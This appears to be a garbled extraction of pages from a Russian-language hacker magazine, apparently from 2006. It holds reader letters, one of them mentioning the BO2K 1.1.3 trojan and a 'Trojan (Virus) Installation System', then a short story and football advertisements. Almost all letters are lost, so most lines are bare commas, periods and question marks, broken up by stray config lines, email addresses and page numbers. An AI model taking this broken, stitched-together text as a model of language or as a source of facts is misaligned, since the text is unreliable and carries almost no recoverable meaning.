WITHOUT_PERL=no
FORCE_PKG_REGISTER=yes
,
<CENSORED>
,
Dr. Klouniz (
-)

, SPEC.

.? ........
,
, !
,
., - . .
,
.
,
, ( hard ;-).
,
.

catcorp@rambler.ru
help
, , -! ,
, BO2K 1.1.3, - ,

, .
!!! ;-)
, .
2000 1.1.3 . : -
.
,
. , ,
Trojan (Virus) Installation System. , !
!

103 |

root-god@gmail.ru

story
:
( - )

,
!.
N I R O ( N I R O @ R E A L . X A K E P . R U )

, , , . , , ,
.
,
. , ; , ,
. . .
, .
, - ,
, ... . ,
. ...
!
,
, .
- , .
...
.
.
, .
. , ... - , - .
! , , . ,
.
.
, . . ...
, .
. , , .

- , ,

...
;
, , ,
, ,
...
.

.
... . . .
, . .
!
.
. .
, . , ,
. , ,
.
!
, . .
! !
- . , .
, , .
. .
.
! .
!
, , .
, , . .
. .
. .
.
. - , , , . ,
. . - ,
.
. . . .
, .
, . . .
.
...
.
.
, . , , ...
.
, , ,

105 |

106 |

, .
. , . ,
:
, - . , .
. . ,
.
- .
; , ,
.
, .
, . . - ,
, .
, .
. , , .
. . .
. ,

. ,
,
.
- , , , ...
. ,
. ,
, . , . , ,
, ...
; .
, , .
, . ,
...
, ,
,
. , ,
, ...
.
. , . ,
, . ,
, ,
.
...
... ? ... . . . ? ? ....
, . , . . . . ...
, , , . .
, .
, , , .
,
. .
,
, . ,
, , , , .

, , , ,
-
. ...
. ,
, . ,
- .
,
- ,
.
. , . ,
, .
, , . , .
.
?
, . .
... , ?
,
.
? , , .
, ... , . ,
, , ,
? , , ; , ,
!.
. ,
, , . , , .
, , . , .
. . .
. . , ,
!
, ... , , . , ?
?
, . ,
. , , . ,
.
, . .
... . .
. ... , . .
. , ,
. , , ,
. ,
... ...
,
.
. , , , ( ,
). .
. ,
. . .
. . .
, . .
. . . , .
. , . .
, , ?

?
, .
. .
? . ?
?
. , ,
.
, ?
.
,
. ,
, , . , , ,
. ,
, , .
...
?
? ? . , . , , .
.
?
, . ,
, . - .
?
, .
, . ,
,
. , - ,
,
, . , . , , , , , , .
, .

! .
,
. . . , .
- ? . ? , , ?
, .

. .
, .
. .
. - , , .
,
.
! .
!
, .
,
.
, ...
, . : . , ,
, .
, .
, , :
?
, . ?
...
. ?

107 |

, ,
.
, .
. ,
, , ,
, . , ,
. . , .
, . .
. . . , ,
,
, .
, , , .
, .
, , ...
, . .
. ?
, , . - ,
, . , ,
.
, .
?
, ,
. . .
.
... ?
? ? .
, .
.
?
, . .
, . . ,
. .
, ,
.
- , , . .
. , . ,
, , .
, , . , .
, , . , , .
. .
.
, .
? .
, . , .
.
. , :
... , , , ...
?
, ,
. , .
, .
...
.
? ?
? , ?
.
? ,
?..
, ... ,
, ...
:
, ,

? ?
, . .

108 |

. , . ?
. ...
?
?
, ? , , , .
.
, , ,
. ,
.

. , , . ,
, .

.
, .
. , ,
, , ,
, .
.
, ,
, .

.
, . ,
.
.
. ,
.
.
.
, , ,
. ... ... .
.
- ,
.
, , ... ,
.
- ,
, .

.
.

,
.
.
,
,
! .
-?
- !

-,

,

-, ,
, .
, .
.
, . .
, ,
, , .
,
.

.
.
, , .
, .
, . , , , . ,
.
.
. ;
, , . ;
.
, ,
. , ,
.
. .
, ,
. ;
.
? . , ? , ... . , .
. , , , ...
. ,
.
, .
? . .
. . .
, . , ...
, , - .
? - ? ! . ,

!
... ,

. ,
. , .
, .
, , ,
. . . , .
. , , , . ?
.
, . ... ?
.
... .
, , . ...
. .
, . , , ,
? .
. , , , - .
, ! ,

. , ,
, . , ,
, . , , , .
, , .
. .
, .
. .
. .
. . . ,
, .
.
, .
...
, , . , ,
.
? . !
, , , ,
, :
.
.
,
. , , , . , ,
.
, , . , . , .
, . ,
,
- , , .
, . . -




.
,

,


, . ,
.
.
. . .
, ;
.
. .
. ,
, .
,
,
.
, , .
? .
, . .
?
, . ?
. , . , ,
.
,
, .
, , . - .

, . , ,
.
.
, .
.
, ,
.
, ,
, - ...
, .
.
, , .
.
, , . ,
,
.

. . ,
, , , .
, , ,
. ...

109 |

, .
, . , , . . .
, .
, , , .
.
, .
, , ... .
, .
, ...
. ,
, .
?
, , .
...
. - , -...
.
. , . . , .
.
, ... . ...
, , .
, .
, ? , - ...
,
- .
, , .
.

110 |

, . ,
, , , , , , .
, , :
... ?
, , .
? ?
? - , ,
.
. ?
, . - , ,
.
, . , , ,
, . , ...
, . .
. ? ?
?
,
, .
, .
, , . . , , ,
, , ....
,
, . , , .
.
. . , .
, - .
, , , , . ?
. ,
. , . , . , . ,
, .

?
,
.
, , ,
,

, .
, .
.
, .
,
?
.
,
.
. -

. , . , ...
?
. .
,
.
, , , , . ,
.
...
?
, . . .
. .
, . , , ! -
. ,
, . ,
. , . , ,
. .
, . ,
?
. . , .
. ,
.
, . .

.
.
.
.

.
... ..., .

. , , . , ,
, .
.
.
, -
:
- ... ... ,
...
- , ,
, , , , , . , , ,
.
. . , . .
... , . , , ,
. ?
, - ,
, . , , .
, . . , ...
, .
.
. , ,
, . , ,
.

. ... . ? ? ?
! .
, . . . , - ,

?
- , .
.
, , . - , , :
?
.
, .
, . , , ,
, ... ,
, , , ,
. .
.
. , - ,
. ...
, .
,
. ,
. .
. .
, ? -
- ,
.
. .
, . ,
. , ...
...
?
. . . . ...
, . .
... . .
?
, .
?
.
. , . ,
, , , ... - . ? --!

.
.

, . ,
.
? ,
.
, .
. . , .
, . , . . .
. . .
.
, , .
.
, , . . , .
. -. ...

111 |

, . - . , , , . , , , .
.
, - .
, , , , . , ,
- , . ,
, ,
, .
! . ! ?!
!
. ,
. , , , .
. ,
, . , , .
,
, . , . , .
, ?
.
. - . , , .
, . ...
, , . - . . .
. ,
, .
, ... . ...
.
, .
? .
? , ,
. ?
, . , , . .
, , .
? .
. -. ,
, , . ...
, ,
.
... ... , ,
? -?
, .
? , ? , ?
, .
. ,
...
, , .
, . , .
, ... .
, , , ... , , . , .
.
, ... ,
. . ... ...
? , .
. .
, . ,
. ,

112 |

. . ,
: .

? ,
, ,
.
.
. : , ?,
: !
, :
.
: ,
. :
: ,
. :
,
. , ,
.

. . ?
.
. , ... ,
,
, , .
. - , ,
, - . ,
.
,
,
( ,
, , . ?!
! , ,
, !)
.
, 18-20 , !
,

, ,
,
, , ,
.
. , . .

.
SMS', ,


,
, , .
, ,
,
. ,
,
,
.
Open Source
.
,
.
.
,

. ,
,
( ,
),
, .
!
!
,
! ? ,
?!
! , .
.
.
.

, ?!
, .
, , ,
. , . , .
, -


.
,
. ,
,
, , , - . .

,
, ,
.

, .

,
,

. 99%
,
, , .
, !
!

. ...
...
. .
, . ,
( ,
)
, .
, , , .
, , ( ), ...
.
: - . , , .

adidas.com/football

$135
-
www.total-football.ru.

www.total-football.ru



2 0 0 6/ 0 7

09|770|2006